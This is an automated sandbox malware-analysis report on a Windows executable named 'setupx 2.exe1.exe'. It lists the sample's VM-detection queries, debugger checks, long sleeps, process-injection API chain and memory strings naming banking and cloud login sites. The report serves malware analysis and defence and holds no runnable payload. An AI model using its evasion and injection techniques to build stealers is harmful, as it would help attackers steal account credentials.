Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: setupx 2.exe1.exe

Static file information: File size 1385984 > 1048576

Source: setupx 2.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018DFCA push ecx; ret	0_2_0018DFDD
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001604DD push ebx; iretd	2_2_001604E3
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001604F7 push ebx; iretd	2_2_001604F9
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0014A775 push es; iretd	2_2_0014A776
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0018DFCA push ecx; ret	2_2_0018DFDD
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040FA67 push esi; ret	3_2_0040FA68
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00454422 push edi; retf	3_2_00454423
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042B48C push eax; retf	3_2_0042B48D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00455CB0 push cs; ret	3_2_00455C69
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00427569 push ebp; mov dword ptr [esp], ebx	3_2_0042756D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00452736 push eax; ret	3_2_00452737

Source: setupx 2.exe1.exe

Static PE information: section name: .text entropy: 7.09207256696417

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Window / User API: threadDelayed 6540

Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe TID: 2644	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe TID: 3796	Thread sleep count: 6540 > 30			Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0019FCDE FindFirstFileExW,	0_2_0019FCDE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0019FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0019FD8F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0019FCDE FindFirstFileExW,	2_2_0019FCDE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0019FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_0019FD8F

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: setupx 2.exe1.exe, 00000003.00000003.1013344220.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1013126134.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1778278456.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1127948218.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1108840253.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2243952725.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2243427244.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1088080681.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1087834589.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1087965493.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: setupx 2.exe1.exe, 00000003.00000003.1039570211.00000000032AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: setupx 2.exe1.exe, 00000003.00000003.1039648408.000000000329D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 0_2_0012553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,

0_2_0012553B

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 0_2_0018DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0018DC9E

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 0_2_001B61B4 mov edi, dword ptr fs:[00000030h]

0_2_001B61B4

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 0_2_0019B71C GetProcessHeap,

0_2_0019B71C

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0018D8E2
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0018DC9E
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018DC92 SetUnhandledExceptionFilter,	0_2_0018DC92
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00195DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00195DCE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0018D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0018D8E2
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0018DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0018DC9E
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00195DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00195DCE

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 0_2_001B61B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_001B61B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Memory written: C:\Users\user\Desktop\setupx 2.exe1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"			Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"			Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	0_2_0019B007
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0019F048
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	0_2_0019F8B3
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	0_2_0019F299
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	0_2_0019AB0C
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0019F334
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	0_2_0019F587
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	0_2_0019F5E6
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	0_2_0019F6BB
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	0_2_0019F706
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0019F7AD
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	2_2_0019B007
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0019F048
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	2_2_0019F8B3
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	2_2_0019F299
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,	2_2_0019AB0C
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_0019F334
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: EnumSystemLocalesW,	2_2_0019F587
